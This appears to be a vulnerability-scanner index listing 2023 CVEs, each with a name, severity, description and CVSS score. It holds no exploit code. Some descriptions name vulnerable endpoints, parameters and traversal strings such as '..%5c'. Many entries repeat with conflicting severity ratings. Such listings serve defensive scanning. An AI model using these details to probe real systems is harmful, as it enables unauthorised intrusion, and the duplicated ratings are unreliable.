{"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"critical","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"}
{"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"high","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"}
{"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"}
{"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"}
{"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"}
{"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"medium","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"}
{"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"critical","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"}
{"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"}
{"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"high","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"}
{"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"high","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"}
{"ID":"CVE-2023-27292","Info":{"Name":"OpenCATS - Open Redirect","Severity":"medium","Description":"OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-27292.yaml"}
{"ID":"CVE-2023-2732","Info":{"Name":"MStore API \u003c= 3.9.2 - Authentication Bypass","Severity":"critical","Description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2732.yaml"}
{"ID":"CVE-2023-27350","Info":{"Name":"PaperCut - Unauthenticated Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27350.yaml"}
{"ID":"CVE-2023-27372","Info":{"Name":"SPIP - Remote Command Execution","Severity":"critical","Description":"SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27372.yaml"}
{"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"}
{"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"high","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"}
{"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"}
{"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"critical","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"}
{"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"}
{"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"}
{"ID":"CVE-2023-2796","Info":{"Name":"EventON \u003c= 2.1 - Missing Authorization","Severity":"medium","Description":"The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-2796.yaml"}
{"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"}
{"ID":"CVE-2023-2822","Info":{"Name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2822.yaml"}
{"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"}
{"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"}
{"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"}
{"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"}
{"ID":"CVE-2023-29084","Info":{"Name":"ManageEngine ADManager Plus - Command Injection","Severity":"high","Description":"Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29084.yaml"}
{"ID":"CVE-2023-28665","Info":{"Name":"Woo Bulk Price Update \u003c2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The Woo Bulk Price Update WordPress plugin, in versions \u003c 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-28665.yaml"}
{"ID":"CVE-2023-29084","Info":{"Name":"ManageEngine ADManager Plus - Command Injection","Severity":"high","Description":"Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-29084.yaml"}
{"ID":"CVE-2023-29298","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29298.yaml"}
{"ID":"CVE-2023-29300","Info":{"Name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29300.yaml"}
{"ID":"CVE-2023-29489","Info":{"Name":"cPanel - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"}
{"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"}
{"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"}
{"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"}
{"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"}
{"ID":"CVE-2023-29887","Info":{"Name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","Severity":"high","Description":"A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29887.yaml"}
{"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"high","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"}
{"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"high","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"}
{"ID":"CVE-2023-29923","Info":{"Name":"PowerJob \u003c=4.3.2 - Unauthenticated Access","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29923.yaml"}
{"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"critical","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"}
{"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"}
{"ID":"CVE-2023-29923","Info":{"Name":"PowerJob \u003c=4.3.2 - Unauthenticated Access","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29923.yaml"}
{"ID":"CVE-2023-30019","Info":{"Name":"Imgproxy \u003c= 3.14.0 - Server-side request forgery (SSRF)","Severity":"medium","Description":"imgproxy \u003c=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30019.yaml"}
{"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"}
{"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"}
{"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"}
{"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"}
{"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"}
{"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"}
{"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"}
{"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"}
{"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"medium","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"}
{"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"high","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"}
{"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"}
{"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"}
{"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"}
{"ID":"CVE-2023-33338","Info":{"Name":"Old Age Home Management System v1.0 - SQL Injection","Severity":"critical","Description":"Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33338.yaml"}
{"ID":"CVE-2023-33439","Info":{"Name":"Faculty Evaluation System v1.0 - SQL Injection","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33439.yaml"}
{"ID":"CVE-2023-33440","Info":{"Name":"Faculty Evaluation System v1.0 - Remote Code Execution","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33440.yaml"}
{"ID":"CVE-2023-3345","Info":{"Name":"LMS by Masteriyo \u003c 1.6.8 - Information Exposure","Severity":"medium","Description":"The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-3345.yaml"}
{"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"}
{"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"}
{"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"}
{"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"}
{"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"}
{"ID":"CVE-2023-34537","Info":{"Name":"Hoteldruid 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-34537.yaml"}
{"ID":"CVE-2023-34598","Info":{"Name":"Gibbon v25.0.0 - Local File Inclusion","Severity":"high","Description":"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34598.yaml"}
{"ID":"CVE-2023-34599","Info":{"Name":"Gibbon v25.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34599.yaml"}
{"ID":"CVE-2023-34598","Info":{"Name":"Gibbon v25.0.0 - Local File Inclusion","Severity":"critical","Description":"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34598.yaml"}
{"ID":"CVE-2023-34599","Info":{"Name":"Gibbon v25.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-34599.yaml"}
{"ID":"CVE-2023-3460","Info":{"Name":"Ultimate Member \u003c 2.6.7 - Unauthenticated Privilege Escalation","Severity":"critical","Description":"The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3460.yaml"}
{"ID":"CVE-2023-34659","Info":{"Name":"JeecgBoot 3.5.0 - SQL Injection","Severity":"critical","Description":"jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34659.yaml"}
{"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"}
